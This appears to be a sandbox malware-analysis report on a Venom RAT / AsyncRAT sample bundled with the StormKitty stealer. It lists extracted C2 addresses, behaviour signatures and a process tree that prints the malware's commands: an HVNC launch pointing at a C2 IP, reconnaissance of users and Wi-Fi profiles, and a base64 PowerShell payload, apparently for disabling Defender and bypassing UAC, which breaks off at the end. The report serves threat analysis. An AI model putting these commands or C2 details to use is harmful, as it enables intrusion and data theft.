Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

Client.exe

windows10-2004-x64

10

Resubmissions

13/01/2025, 01:08 UTC

250113-bhl5gs1kfl 10

12/01/2025, 12:45 UTC

250112-pzgszsspby 10

10/01/2025, 15:08 UTC

250110-shv6tszqaq 10

Analysis

  • max time kernel
    822s
  • max time network
    725s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/01/2025, 15:08 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client.exe

  • Size

    74KB

  • MD5

    5b1f7f243956595af2cef317a273275e

  • SHA1

    f6bcfbc268be9c272559f7345d1684b27d983fe1

  • SHA256

    c29bc00a3915c04961b3a25c499c3c9f43c33c6b484c00df4a5c8b3695344bea

  • SHA512

    1979d0564afeeaec460c86179707ff29da602ab1c66958453c52816f99e863665cdb0f08bb5b540615c8f54b752dc8ba8bb655a15b52eb5a0c5d4d9d33dccfbf

  • SSDEEP

    1536:EUzkcx4VHsC0SPMV7e9VdQuDI6H1bf/0dmIQzc2LVclN:EUwcx4GfSPMV7e9VdQsH1bfEmIQPBY

Score
10/10
asyncratstormkittydefaultcollectiondiscoveryevasionexecutionpersistenceprivilege_escalationratspywarestealertrojan

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

127.0.0.1:4449

127.0.0.1:8000

127.0.0.1:64240

193.161.193.99:4449

193.161.193.99:8000

193.161.193.99:64240
Mutex

oklwlbhdlrw

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
Ik28hrqPT2p4HG0fuMz1FInI5TH7YVQz

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
    evasiontrojan
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

    discovery
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 45 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Accesses Microsoft Outlook profiles
    • Checks whether UAC is enabled
    • Drops desktop.ini file(s)
    • Suspicious use of SetThreadContext
    • Drops file in Program Files directory
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • System policy modification
    • outlook_office_path
    • outlook_win_path
    PID:1652
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:748
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
      2⤵
        PID:4840
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
        2⤵
        • System Location Discovery: System Language Discovery
        PID:952
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4644
        • C:\Windows\system32\PING.EXE
          ping google.com
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3184
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/
        2⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:6324
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8a61c46f8,0x7ff8a61c4708,0x7ff8a61c4718
          3⤵
            PID:6340
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
            3⤵
              PID:3240
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:544
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
              3⤵
                PID:4744
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                3⤵
                  PID:392
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                  3⤵
                    PID:3088
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
                    3⤵
                      PID:4976
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
                      3⤵
                        PID:6776
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
                        3⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3584
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
                        3⤵
                          PID:5216
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
                          3⤵
                            PID:5224
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
                            3⤵
                              PID:5892
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
                              3⤵
                                PID:5900
                            • C:\Windows\explorer.exe
                              "C:\Windows\explorer.exe"
                              2⤵
                                PID:216
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
                                2⤵
                                  PID:1960
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:368
                                • C:\Windows\explorer.exe
                                  "C:\Windows\explorer.exe"
                                  2⤵
                                    PID:1072
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4449 HVNC_MUTEX
                                    2⤵
                                      PID:704
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4449 HVNC_MUTEX
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2568
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      "cmd.exe"
                                      2⤵
                                        PID:5704
                                        • C:\Windows\system32\systeminfo.exe
                                          systeminfo
                                          3⤵
                                          • Gathers system information
                                          PID:5748
                                        • C:\Windows\system32\HOSTNAME.EXE
                                          hostname
                                          3⤵
                                            PID:2304
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic logicaldisk get caption,description,providername
                                            3⤵
                                            • Collects information from the system
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5136
                                          • C:\Windows\system32\net.exe
                                            net user
                                            3⤵
                                              PID:5164
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user
                                                4⤵
                                                  PID:5168
                                              • C:\Windows\system32\query.exe
                                                query user
                                                3⤵
                                                  PID:5184
                                                  • C:\Windows\system32\quser.exe
                                                    "C:\Windows\system32\quser.exe"
                                                    4⤵
                                                      PID:5988
                                                  • C:\Windows\system32\net.exe
                                                    net localgroup
                                                    3⤵
                                                      PID:1512
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 localgroup
                                                        4⤵
                                                          PID:5212
                                                      • C:\Windows\system32\net.exe
                                                        net localgroup administrators
                                                        3⤵
                                                          PID:6160
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 localgroup administrators
                                                            4⤵
                                                              PID:6300
                                                          • C:\Windows\system32\net.exe
                                                            net user guest
                                                            3⤵
                                                              PID:6024
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 user guest
                                                                4⤵
                                                                  PID:6044
                                                              • C:\Windows\system32\net.exe
                                                                net user administrator
                                                                3⤵
                                                                  PID:1556
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 user administrator
                                                                    4⤵
                                                                      PID:3364
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic startup get caption,command
                                                                    3⤵
                                                                      PID:6828
                                                                    • C:\Windows\system32\tasklist.exe
                                                                      tasklist /svc
                                                                      3⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:996
                                                                    • C:\Windows\system32\ipconfig.exe
                                                                      ipconfig /all
                                                                      3⤵
                                                                      • Gathers network information
                                                                      PID:4160
                                                                    • C:\Windows\system32\ROUTE.EXE
                                                                      route print
                                                                      3⤵
                                                                        PID:4776
                                                                      • C:\Windows\system32\ARP.EXE
                                                                        arp -a
                                                                        3⤵
                                                                        • Network Service Discovery
                                                                        PID:1760
                                                                      • C:\Windows\system32\NETSTAT.EXE
                                                                        netstat -ano
                                                                        3⤵
                                                                        • System Network Connections Discovery
                                                                        • Gathers network information
                                                                        PID:3068
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc query type= service state= all
                                                                        3⤵
                                                                        • Launches sc.exe
                                                                        PID:1500
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh firewall show state
                                                                        3⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:1176
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh firewall show config
                                                                        3⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:4340
                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                      2⤵
                                                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                                                      PID:3236
                                                                      • C:\Windows\system32\chcp.com
                                                                        chcp 65001
                                                                        3⤵
                                                                          PID:5276
                                                                        • C:\Windows\system32\netsh.exe
                                                                          netsh wlan show profile
                                                                          3⤵
                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                          PID:6984
                                                                        • C:\Windows\system32\findstr.exe
                                                                          findstr All
                                                                          3⤵
                                                                            PID:2508
                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                          "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                          2⤵
                                                                            PID:540
                                                                            • C:\Windows\system32\chcp.com
                                                                              chcp 65001
                                                                              3⤵
                                                                                PID:4508
                                                                              • C:\Windows\system32\netsh.exe
                                                                                netsh wlan show networks mode=bssid
                                                                                3⤵
                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                PID:5492
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0A